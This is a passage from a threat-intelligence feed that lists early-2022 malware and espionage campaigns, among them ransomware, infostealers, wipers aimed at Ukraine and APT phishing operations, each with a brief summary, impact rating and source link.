Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage

Intel Source:: ASEC

Intel Name:: Vollgar CoinMiner targets MSSQL

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: Researchers from ASEC is monitoring a specific form of CoinMiner that has been consistently distributed to vulnerable MS-SQL servers. ASEC Infrastructure has detected Vollgar CoinMiner samples in the logs. Vollgar is a typical CoinMiner that is installed via brute force attacks against MS-SQL servers with vulnerable account credentials.

Source: https://asec.ahnlab.com/en/32143/

Intel Source:: ASEC

Intel Name:: Magniber Ransomware being Redistributed

Date of Scan:: 2022-03-02

Impact:: MEDIUM

Summary:: ASEC researchers has identified a redistribution campaign by Magniber ransomware which disguised itself as Windows update files. The distributed magniber files have normal Windows Installer (MSI) as their extension. Magniber ransomware is currently distributed using typosquating techniques targeting Chrome and Edge users with the latest Windows version.

Source: https://asec.ahnlab.com/en/32226/

Intel Source:: Checkpoint

Intel Name:: Electron Bot - SEO poisoning malware

Date of Scan:: 2022-03-01

Impact:: MEDIUM

Summary:: Researchers at Check Point Research has identifed a new malware dubbed as Electron Bot which has infected over 5000 active machines worldwide and being distributed through Microsoft’s official store. Electron Bot is a modular SEO poisoning malware which is used for social media promotion and click fraud. Once malware persist inside the targeted system it executes attacker commands such as controlling social media accounts on Facebook Google and Sound Cloud.

Source: https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/

Intel Source:: Cofense

Intel Name:: QakBot Campaign with old Tactics

Date of Scan:: 2022-03-01

Impact:: MEDIUM

Summary:: Confense Phishing Defense Center has analysed emails delivering Qakbot that use a familiar tactic which is used in old emails.

Source: https://cofense.com/blog/qakbot-campaign-attempts-to-revive-old-emails

Intel Source:: Mandiant

Intel Name:: UNC3313 targets MiddleEast government

Date of Scan:: 2022-03-01

Impact:: MEDIUM

Summary:: Mandiant researchers recently responded to an intrusion activity by UNC3313 who were targetting Middle East government also new targeted malware was used Gramdoor and Starwhale. The whole process started with targted spear phishing email.

Source: https://www.mandiant.com/resources/telegram-malware-iranian-espionage

Intel Source:: WeLiveSecurity

Intel Name:: New wiper and worm targets Ukraine

Date of Scan:: 2022-03-01

Impact:: HIGH

Summary:: ESET researchers discovered new set of malwares and worm after the invasion of Russia on Ukraine. The malware was dubbed as IsaacWiper and HermeticWizard also a decoy ransomware called Hermeticransom aks Partyticket ransomware.

Source: https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

Intel Source:: ASEC

Intel Name:: ColdStealer Infostealer

Date of Scan:: 2022-03-01

Impact:: MEDIUM

Summary:: Researchers from ASEC has analysed a new type of Infostealer dubbed as ColdStealer it disguises as a software download for cracks and tools. There are two type of distribution methods used by ColdStealer first it distribute single type of malware like CryptBot or RedLine secondly Dropper type malware.

Source: https://asec.ahnlab.com/en/32090/

Intel Source:: Palo Alto

Intel Name:: Spear Phishing attacks on Ukraine

Date of Scan:: 2022-03-01

Impact:: MEDIUM

Summary:: Researchers from PaloAlto identified a spear phishing campaign which was attributed to UAC-0056. The target organization were from Ukraine and the payloads included the Document Stealer OutSteel and the Downloader SaintBot.

Source: https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

Intel Source:: SentinelOne

Intel Name:: Evolution of EvilCorp

Date of Scan:: 2022-02-28

Impact:: MEDIUM

Summary:: Researchers from Sentinel Labs have assessed with high confidence that WastedLocker Hades Phoenix Locker PayloadBIN belongs to the same cluster of malware which EvilCorp operates. A technical analysis was also done on the evolution evolution of Evil Corp from Dridex through to Macaw Locker and for the first time publicly describe CryptOne and the role it plays in Evil Corp malware development.

Source: https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

Intel Source:: Palo Alto

Intel Name:: SockDetour Targets U.S. Defense Contractors

Date of Scan:: 2022-02-28

Impact:: MEDIUM

Summary:: Researchers from PaloAlto have came across a stealthy custom malware SockDetour that targeted U.S.-based defense contractors. Analysis shows that SockDetour was delivered from an external FTP server to a U.S.-based defense contractor's internet-facing Windows server.

Source: https://unit42.paloaltonetworks.com/sockdetour/

Intel Source:: STR

Intel Name:: MuddyWater_Seeder Queries_25/02/2022

Date of Scan:: 2022-02-28

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: netlab360

Intel Name:: DDoS attacks against Ukrainian Websites

Date of Scan:: 2022-02-28

Impact:: MEDIUM

Summary:: NetLab360 researchers analyzed recent DDOS attack on Ukrainian websites and tracked botnets who were involved in it. Also as per them the C2s belong to multiple malware family including Mirai Gafgyt ripprbot moobot and ircBot.

Source: https://blog-netlab-360-com.translate.goog/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN

Intel Source:: Intel471

Intel Name:: TrickBot Switches to New Malware

Date of Scan:: 2022-02-28

Impact:: MEDIUM

Summary:: As per the recent report by Intel 471 Trickbot is switching its operations and joining hands with Emotet operators. Also it has been noticed that Bazar malware family was also linked to trickbot recently as operators were taking over the TrickBot operations.

Source: https://intel471.com/blog/trickbot-2022-emotet-bazar-loader

Intel Source:: Mandiant

Intel Name:: UNC2596 deploys Cuba ransomware

Date of Scan:: 2022-02-28

Impact:: MEDIUM

Summary:: Mandiant researchers have tracked a ransomware gang as UNC2596 who also claims to be COLDDRAW and commonly known as Cuba ransomware have been found exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. Cuba operation primarily targets the United States followed by Canada.

Source: https://www.mandiant.com/resources/unc2596-cuba-ransomware

Intel Source:: FBI/NCSC/CISA

Intel Name:: Muddywater attacks U.S/Worldwide

Date of Scan:: 2022-02-25

Impact:: HIGH

Summary:: Authorities from US and UK have released a detailed advisory about the recent cyber espionage campaign of MuddyWater which is allegedly state sponsored by Iran and works in the interests of MOIS. In this current campaign they have been mainly targeting government and private organizations from industries including telecom defense oil & gas located in Asia Africa Europe and North America. This time they have come up with a variety of malwares ranging from PowGoop Small Sieve Mori and POWERSTATS

Source: https://www.ic3.gov/Media/News/2022/220224.pdf

Intel Source:: Intezer

Intel Name:: TeamTNT targeting Linux servers

Date of Scan:: 2022-02-24

Impact:: MEDIUM

Summary:: Researchers at Intezer have alerted with TTPs of TeamTNT threat actor. Over the past year TeamTNT threat actor has been very active and is one of the predominant cryptojacking threat actors however currently targeting Linux servers.

Source: https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/

Intel Source:: ESET

Intel Name:: HermeticWiper Malware

Date of Scan:: 2022-02-24

Impact:: MEDIUM

Summary:: ESET Research discovered a new data wiper malware used against Ukraine. ESET detected that it was installed on hundreds of machines in the country. This follows the DDoS attacks against several Ukrainian websites.

Source: https://twitter.com/ESETresearch/status/1496581908460941318 https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/ https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ http://f5.pm/go-104012.html https://www.zscaler.com/blogs/security-research/hermetic-wiper-resurgence-targeted-attacks-ukraine https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/ https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia http://blog.talosintelligence.com/2022/02/threat-advisory-hermeticwiper.html https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf

Intel Source:: NCSC-UK

Intel Name:: Cyclops Blink malware by Sandworm

Date of Scan:: 2022-02-24

Impact:: MEDIUM

Summary:: A Joint advisory has been published by NCSC [UK] and CISA FBI NSA [USA] that identifies a new malware used by the actor Sandworm. Sandworm also known as Voodoo Bear has previously been attributed to Russia’s GRU. The malware dubbed Cyclops Blink appears to be a replacement for the VPNFilter malware exposed in 2018 and its deployment could allow Sandworm to remotely access networks. The advisory also includes information on the associated TTPs used by Sandworm.

Source: https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf

Intel Source:: CyCraft

Intel Name:: Operation Cache Panda

Date of Scan:: 2022-02-23

Impact:: LOW

Summary:: Researchers from Cycraft have came across campaign which has been targetting Taiwan's Financial trading sector with supply chain and this camapign has been attributed to allegedly state sponsored threat actor APT10.

Source: https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934

Intel Source:: Cado security

Intel Name:: Katana Botnet exploited Ukrainian websites

Date of Scan:: 2022-02-22

Impact:: MEDIUM

Summary:: A team from Cado security have identified the source as 'Katana botnet' (one of the Mirai variant) was behind the series of DDoS attacks against Ukrainian websites between 15-16 February. The impacted sites included Banks Government and Military websites. Moreover Ukrainian CERT 360Netlab and BadPackets have attributed the source of these attacks to Mirai botnet.

Source: https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/

Intel Source:: ASEC

Intel Name:: CryptBot Infostealer

Date of Scan:: 2022-02-22

Impact:: MEDIUM

Summary:: A new version of the CryptBot info stealer was found by ASEC researchers which was getting distributed via multiple websites that offer free downloads of cracks for games and pro-grade software. In the current version of the CryptoBot there is only one infostealing C2.

Source: https://asec.ahnlab.com/en/31802/

Intel Source:: Checkpoint

Intel Name:: Predatory Sparrow targets Iran's BroadCaster

Date of Scan:: 2022-02-22

Impact:: LOW

Summary:: A wave of cyberattacks has floaded Iran in 2021 and early 2022. CPR team has done a technical analysis on one of the attacks against Iranian national media corporation Islamic Republic of Iran Broadcasting (IRIB) which occurred in late January 2022.

Source: https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/

Intel Source:: ASEC

Intel Name:: Cobalt Strike targets MS-SQL servers

Date of Scan:: 2022-02-22

Impact:: MEDIUM

Summary:: Researchers from ASEC discovered a campaign in which unpatched Microsoft SQL Database servers were targetted by distribution of Cobalt Strike. The attacker usually scans port 1433 to check if MS-SQL servers open to the public if its found open then they launch brute forcing or dictionary attacks against the admin account.

Source: https://asec.ahnlab.com/en/31811/

Intel Source:: DFIR Report

Intel Name:: Qbot utilized to exploit ZeroLogon Vulnerability

Date of Scan:: 2022-02-22

Impact:: MEDIUM

Summary:: Researchers at DFIR Report has discovered that threat actors are exploiting Qbot and ZeroLogon vulnerability. The threat actor gained their initial access through the execution of a malicious DLL.

Source: https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

Intel Source:: Blackberry

Intel Name:: Arkei Infostealer utilizing SmokeLoader

Date of Scan:: 2022-02-22

Impact:: MEDIUM

Summary:: The latest analysis of the Arkei Infostealer shows that the cyber-thieves are increasingly targeting people using multifactor authentication as well as crypto-wallets. Arkei Infostealer is often sold and distributed as Malware-as-a-Service and has been spotted utilizing SmokeLoader as a method of deployment. Both Arkei and SmokeLoader have been identified using the same IOCs and known-malicious URLs to conduct their malicious operations.

Source: https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer?utm_medium=social&utm_source=bambu

Intel Source:: ISC.SANS

Intel Name:: Remcos RAT

Date of Scan:: 2022-02-21

Impact:: MEDIUM

Summary:: ISC SANS Researcher has shared an analysis for a sample received via email. The file was received as an attachment to a mail that pretended to be related to a purchase order. Later Researcher attributed the file to Remcos RAT.

Source: https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/

Intel Source:: ASEC

Intel Name:: PseudoManuscrypt Malware

Date of Scan:: 2022-02-21

Impact:: MEDIUM

Summary:: Multiple windows machines in South Korea have been attacked by PseudoManuscrypt malware. This malware is said to be using the same tactics as of CryptBot. The malware's target have been mostly government and industrial organization.

Source: https://asec.ahnlab.com/en/31683/

Intel Source:: SentinelOne

Intel Name:: TunnelVision exploiting Log4j

Date of Scan:: 2022-02-21

Impact:: MEDIUM

Summary:: SentinelOne researchers have observed some activities of TunnelVision attackers which focuses on exploitation of VMware Horion Lojg4j vulnerabilities. The attackers actively exploiting the vulnerability to run malicious PowerShell commands deploy backdoors create backdoor users harvest credentials and perform lateral movement. Moreover Researchers has been tracking the activity of the Iranian threat actor operating in the Middle-East and the US.

Source: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/

Intel Source:: Palo Alto

Intel Name:: Gamaredon targets Ukraine

Date of Scan:: 2022-02-18

Impact:: HIGH

Summary:: The Russia-linked Gamaredon hacking group aka Primitive Bear has been actively targetting wester government entity in Ukraine. The threat vector was phishing attack which leveraged a job search and employment platform within the country as a conduit to upload their malware downloader in the form of a resume for an active job listing related to the targeted entity.

Source: https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/ https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Intel Source:: ZeroFox

Intel Name:: Kraken- A new botnet

Date of Scan:: 2022-02-18

Impact:: MEDIUM

Summary:: Researchers from Zerofox have found a new golang based botneyt dubbed Kraken which is currently under development and has backdoor capabilities to siphon sensitive information from compromised Windows hosts. Their targets are crypto wallets which are not limited to Armory Atomic Wallet Bytecoin Electrum Ethereum Exodus Guarda Jaxx Liberty and Zcash.

Source: https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/#iocs

Intel Source:: Fortinet

Intel Name:: Moses Staff targets Israeli Organization

Date of Scan:: 2022-02-18

Impact:: MEDIUM

Summary:: Moses Staff threat actor has recently launched a new espionage campaign against Israeli organizations. This time they have been leveraging the ProxyShell vulnerability in Microsoft Exchange servers as an initial infection vector to deploy two web shells followed by exfiltrating Outlook Data Files (.PST) from the compromised server.

Source: https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard

Intel Source:: Cofense

Intel Name:: Power BI Phishing Campaign

Date of Scan:: 2022-02-18

Impact:: MEDIUM

Summary:: Cofense Phishing Defense Center has analysed a new phishing campaign that harvests Microsoft credentials by impersonating Power BI emails. Due to Power BI's popularity commonly used and vendor trust it has become the prime target for threat actors to spoof and abuse it for phishing attacks.

Source: https://cofense.com/blog/phishers-spoof-power-bi-to-visualize-your-credential-data

Intel Source:: SentinelOne

Intel Name:: ModifiedElephant APT

Date of Scan:: 2022-02-17

Impact:: MEDIUM

Summary:: SentinelOne researchers attributed the intrusions to a group tracked as 'ModifiedElephant'. The threat actor has been operational since at least 2012 its activity aligns sharply with Indian state interests. The threat actor uses spear-phishing technique with malicious documents to deliver malware such as NetWire DarkComet and keyloggers.

Source: https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

Intel Source:: Inquest

Intel Name:: GlowSpark Campaign

Date of Scan:: 2022-02-17

Impact:: MEDIUM

Summary:: Inquest Labs researchers analysed a malicious document from the GlowSpark campaign which is a possible attack vector in the WhisperGate attack. Some samples of this campaign are quite secretive as it successfully infect the target. This allows the threat actor to gain a strong foothold in the victim's network without leaving a large footprint.

Source: https://inquest.net/blog/2022/02/10/380-glowspark

Intel Source:: STR

Intel Name:: BlackByte TTP_Seeder Queries_16/02/2022

Date of Scan:: 2022-02-17

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Palo Alto

Intel Name:: Emotet new Infection Method

Date of Scan:: 2022-02-17

Impact:: MEDIUM

Summary:: Researchers at Palo Alto Unit42 have found that yet agan the infamous Emotet malware has switched tactics. In an email campaign propagating through malicious Excel files that includes an obfuscated Excel 4.0 macro through socially engineered emails. When the macro is activated it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload

Source: https://unit42.paloaltonetworks.com/new-emotet-infection-method/

Intel Source:: Fortinet

Intel Name:: BitRAT malware

Date of Scan:: 2022-02-16

Impact:: MEDIUM

Summary:: Threat actors are leveraging NFT (Non-fungible tokens) information to lure users into downloading the BitRAT malware. The campaign makes use of malicious Excel files named ‘NFT_Items’ to attract targets. These files are hosted on the Discord app and appear to contain names of NFTs forecasts for potential investment returns and selling quantities.

Source: https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat

Intel Source:: Minerva Labs

Intel Name:: MyloBot Malware

Date of Scan:: 2022-02-16

Impact:: MEDIUM

Summary:: A new version of the MyloBot malware has been observed to deploy malicious payloads that are being used to send sextortion emails demanding victims a huge sum in form of digital currency. MyloBot also leverages a technique called process hollowing wherein the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses.

Source: https://blog.minerva-labs.com/mylobot-2022-so-many-evasive-techniques-just-to-send-extortion-emails

Intel Source:: Proofpoint

Intel Name:: TA2541 APT targets Aviation

Date of Scan:: 2022-02-16

Impact:: MEDIUM

Summary:: ProofPoint researchers have identified threat actor TA2541 to be tragetting avaiation and aersospace industries. The threat actor commonly uses RATs through which they can control compromised machines. It is said that target can be 100 of organizations from North America Europe and the Middle East.

Source: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

Intel Source:: Checkpoint

Intel Name:: Trickbot Attacks Global Giants customers

Date of Scan:: 2022-02-16

Impact:: MEDIUM

Summary:: Researchers from Checkpoint analyzed new evasive technique of TrickBot and also found this time it has been targetting more than 60 firm's customers worldwide. The trickbot operators have been using AntiAnalysis techniques so that researchers can't send automated requests to Command-and-Control servers to get fresh web-injects.

Source: https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/

Intel Source:: SecureWorks

Intel Name:: ShadowPad RAT linked to Chinese government

Date of Scan:: 2022-02-16

Impact:: MEDIUM

Summary:: Researchers from SecureWorks were able to link recent activity of ShadowPad malware to multiple threat actors from China whose activity can be linked to Chinese ministry and PLA. It is the same malware which was behind the attacks on NetSarang CCleaner and ASUS.

Source: https://www.secureworks.com/research/shadowpad-malware-analysis

Intel Source:: Picus Security

Intel Name:: LockBit 2.0 Ransomware TTPs

Date of Scan:: 2022-02-16

Impact:: HIGH

Summary:: On 4th Feb 2022 FBI issued a Flash report on Lockbit 2.0 Ransomware and few IoCs. Picus Security team has also shared TTPs used by the Lockbit 2.0 ransomware operators in emerging ransomware campaigns.

Source: https://www.picussecurity.com/resource/lockbit-2.0-ransomware-ttps-used-in-emerging-ransomware-campaigns

Intel Source:: Sansec

Intel Name:: Magecart attacking Magento sites

Date of Scan:: 2022-02-15

Impact:: MEDIUM

Summary:: According to Sansec more than 350 ecommerce stores infected with malware in a single day. All stores were victim of a payment skimmer loaded from a domain. The doamin is currently offline however the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.

Source: https://sansec.io/research/naturalfreshmall-mass-hack

Intel Source:: FBI FLASH

Intel Name:: BlackByte Ransomware

Date of Scan:: 2022-02-15

Impact:: MEDIUM

Summary:: BlackByte ransomware had compromised multiple US and foreign businesses including entities in at least three US critical infrastructure sectors (government facilities financial and food & agriculture). Recently it came in news when the tansomware attacked San Francisco 49ers ahead of the Super Bowl.

Source: https://www.ic3.gov/Media/News/2022/220211.pdf

Intel Source:: ESET

Intel Name:: OilRig's New Espionage Campaign-Out To Sea

Date of Scan:: 2022-02-14

Impact:: MEDIUM

Summary:: Recently Researchers from ESET discovered a new campaign dubbed 'Out to Sea'. This campaign was attributed to APT34(OilRig) which had also links with Lyceum group. Their malware toolset has also been developed and they have come up with a backdoor named Marlin.

Source: https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf

Intel Source:: Cybereason

Intel Name:: Lorenz Ransomware

Date of Scan:: 2022-02-11

Impact:: MEDIUM

Summary:: Lorenz Ransomware was first seen in February 2021 and it is believed to be a rebranding of '.s40' ransomware. Lorenz Ransomware targets organisations worldwide with customised attacks and targeting victims mostly in English-speacking countries.

Source: https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware

Intel Source:: Cado security

Intel Name:: CoinStomp Malware

Date of Scan:: 2022-02-11

Impact:: MEDIUM

Summary:: Cado Security Researchers has discovered a new malware campaign targeting Asian Cloud Service Providers (CSPs). Researchers dubbed the malware as CoinStomp this family of malware exploit cloud compute instances for the purpose of mining cryptocurrency.

Source: https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/

Intel Source:: ISC.SANS

Intel Name:: Emotet dropping Cobalt Strike

Date of Scan:: 2022-02-11

Impact:: HIGH

Summary:: Researchers at SANS has disected a Cobalt Strike sample dropped by Emotet and shared their analysis.

Source: https://isc.sans.edu/diary/rss/28318

Intel Source:: Cisco Talos

Intel Name:: Transparent Tribe Group/APT36

Date of Scan:: 2022-02-11

Impact:: HIGH

Summary:: Researchers from Talos recently analyszed Crimson RAT and Oblique RATS sample and were able to attribute the attck to Transparent Tribe Threat group also knows as APT36. The thraet actor is known to be targetting India.Their initial infection vector is usually email purporting to come from official sources and containing a lure which can be a Word document or more often an Excel spreadsheet.

Source: http://blog.talosintelligence.com/2022/02/whats-with-shared-vba-code.html

Intel Source:: Sophos

Intel Name:: SolarMarker Campaign

Date of Scan:: 2022-02-11

Impact:: MEDIUM

Summary:: SophosLabs has monitored a series of new efforts to distribute SolarMarker an information stealer and backdoor. It was first detected in 2020 the .NET malware usually delivered by a PowerShell installer has information harvesting and backdoor capabilities.

Source: https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/

Intel Source:: HP

Intel Name:: RedLine Stealer disguised as Windows 11 installer

Date of Scan:: 2022-02-11

Impact:: MEDIUM

Summary:: Threat actors have started luring Windows10 users soon after the announcement of Windows11 upgrade. They are using a fake microsoft website to trick users into downloading and running a fake installer and executing RedLine stealer malware.

Source: https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/

Intel Source:: Intel471

Intel Name:: PrivateLoader

Date of Scan:: 2022-02-10

Impact:: MEDIUM

Summary:: An analysis of a pay-per-install loader by Intel471 researchers has highlighted its place in the deployment of popular malware strains including Smokeloader Vidar and Redline. The distribution of PrivateLoader is mostly through cracked software websites.

Source: https://intel471.com/blog/privateloader-malware

Intel Source:: Proofpoint

Intel Name:: Molerat Palestinian-Aligned Espionage campaign

Date of Scan:: 2022-02-10

Impact:: HIGH

Summary:: A new campaign have been discovered by proofpoint researchers which details about operations of Molerat threat group who is allegedly affliated with Palestanine interest. TA402 is not only abusing Dropbox services for delivery of NimbleMamba but also for malware command and control (C2).

Source: https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage

Intel Source:: DFIR Report

Intel Name:: QakBot Phishing campaign

Date of Scan:: 2022-02-09

Impact:: HIGH

Summary:: Qakbot activities since October 2021 has been demystified by DFIR researchers. A malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document the initial Qbot DLL loader was downloaded and saved to disk.

Source: https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

Intel Source:: Mandiant

Intel Name:: SEO Poisoning distributes BATLOADER malware

Date of Scan:: 2022-02-09

Impact:: HIGH

Summary:: Mandiant researchers uncovered a malicious campaign using SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers created malicious sites and packed it with keywords of popular software products and used search engine optimization poisoning to make them show up higher in search results.

Source: https://www.mandiant.com/resources/seo-poisoning-batloader-atera

Intel Source:: Symantec

Intel Name:: Chinese APT Antlion targets financial institutions

Date of Scan:: 2022-02-09

Impact:: LOW

Summary:: Antlion (Chinese state-backed APT) has been targeting financial institutions in Taiwan in a persistent campaign over the course of at least 18 months. The attackers deployed a custom backdoor we have called xPack on compromised systems which gave them extensive access to victim machines.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks

Intel Source:: Volexity

Intel Name:: Operation EmailThief

Date of Scan:: 2022-02-09

Impact:: MEDIUM

Summary:: Alleged Chinese threat actor tracked as TEMP_Heretic is actively attempting to exploit a zero-day XSS vulnerability in the Zimbra open-source email platform. The campaign has been named as EmailThief. The successful exploitation of the cross-site scripting (XSS) vulnerability could allow threat actors to execute arbitrary JavaScript code.

Source: https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/

Intel Source:: CyberGeeks

Intel Name:: Lazarus APT targeting job seekers

Date of Scan:: 2022-02-09

Impact:: LOW

Summary:: Lazarus APT is yet again targeting job seekers and using job opportunities documents for companies such as LockHeed Martin BAE Systems and Boeing. In this blog researcher analysed document called Boeing BDS MSE.docx it focuses on people that are looking for jobs at Boeing. The malware extracts the hostname username network information a list of processes and other information that will be exfiltrated to one out of the four C2 servers.

Source: https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/

Intel Source:: Cisco Talos

Intel Name:: Arid Viper APT

Date of Scan:: 2022-02-09

Impact:: MEDIUM

Summary:: Cisco Talos has observed a new wave of Delphi malware called Micropsia developed and operated by the Arid Viper APT group since 2017. This campaign targets Palestinian entities and activists using politically themed lures. This is a group believed to be based out of Gaza that's known to target organizations all over the world.

Source: http://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html

Intel Source:: Microsoft

Intel Name:: Mac Trojan:Update Agent

Date of Scan:: 2022-02-09

Impact:: MEDIUM

Summary:: The Mac trojan has evolved and its avatar by name UpdateAgent has added multiple capabilities to its artillerylike bypassing gatekeeper. It lures its victims by impersonating legitimate software and can leverage Mac device functionalities to its benefit.

Source: https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/

Intel Source:: STR

Intel Name:: Lockbit 2.0 TTP_Seeder Queries_07/02/2022

Date of Scan:: 2022-02-08

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: FBI FLASH

Intel Name:: LockBit 2.0 Ransomware

Date of Scan:: 2022-02-08

Impact:: HIGH

Summary:: LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics techniques and procedures (TTPs). LockBit 2.0 ransomware compromises victim networks through a variety of techniques including but not limited to purchased access unpatched vulnerabilities insider access and zero day exploits.

Source: https://www.ic3.gov/Media/News/2022/220204.pdf

Intel Source:: AhnLab

Intel Name:: Gold Dragon Malware

Date of Scan:: 2022-02-08

Impact:: MEDIUM

Summary:: A new wave of activity from the Kimsuky hacking group have been spotted by ASEC analysis team. Group was using xRAT (open-source RAT) and dropped with their custom backdoor dubbed as Gold Dragon. The campaign started on January 24 2022 targeting South Korean entitites and is still ongoing.

Source: https://asec.ahnlab.com/en/31089/

Intel Source:: STR

Intel Name:: QBot_Seeder Queries_07/02/2022

Date of Scan:: 2022-02-08

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: STR

Intel Name:: Blackcat Ransomware_Seeder Queries_04/02/2022

Date of Scan:: 2022-02-07

Impact:: HIGH

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: Bleeping Computer

Intel Name:: BazarBackdoor malware campaign

Date of Scan:: 2022-02-07

Impact:: MEDIUM

Summary:: A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware. The phishing emails pretend to be 'Payment Remittance Advice' with links to remote sites that download a CSV file with names similar to 'document-21966.csv.'

Source: https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/

Intel Source:: @3xport

Intel Name:: Mars Stealer- New variant of Oski Stealer

Date of Scan:: 2022-02-04

Impact:: LOW

Summary:: A new variant of Oski stealer has been identified in the wild named Mars Stealer.It has capability to steal information from all popular web browsers two-factor authentication plugins and multiple cryptocurrency extensions and wallets.

Source: https://3xp0rt.com/posts/mars-stealer

Intel Source:: Cybereason

Intel Name:: StrifeWater RAT added to Iranian APT Moses Staff arsenal

Date of Scan:: 2022-02-04

Impact:: MEDIUM

Summary:: Researchers discovered a previously unidentified Remote Access Trojan (RAT) in the Moses Staff arsenal dubbed StrifeWater. The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks. The RAT possesses other capabilities such as command execution and screen capturing as well as the ability to download additional extensions.

Source: https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Intel Source:: Walmart Global Tech Blog

Intel Name:: Sugar Ransomware

Date of Scan:: 2022-02-04

Impact:: MEDIUM

Summary:: Recently an threat actor has been starting up a RaaS solution that appears to primarily focus on individual computers instead of entire enterprises but is also reusing objects from other ransomware families. Researchers analysed sample from a tweet and concluded it as Sugar Ransomware.

Source: https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb

Intel Source:: PWC

Intel Name:: White Tur Threat Group

Date of Scan:: 2022-02-04

Impact:: MEDIUM

Summary:: A newly detailed threat actor has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors dubbed as 'White Tur' the adversary hasn’t been attributed to a specific geography although it appears to have been active since at least 2017. The adversary was also observed abusing the open source project OpenHardwareMonitor for payload execution.

Source: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html

Intel Source:: Cybereason

Intel Name:: PowerLess Trojan by Phosphorus/APT35

Date of Scan:: 2022-02-03

Impact:: HIGH

Summary:: Cybereason researchers recently discovered a new set of tools which were developed by the Phosphorus group and incorporated into their arsenal including a novel PowerShell backdoor dubbed PowerLess Backdoor. Research also highlights a stealthy technique used by the group to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.

Source: https://www.cybereason.com/blog/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage

Intel Source:: Cisco Talos

Intel Name:: MuddyWater targets Turkish users

Date of Scan:: 2022-02-03

Impact:: HIGH

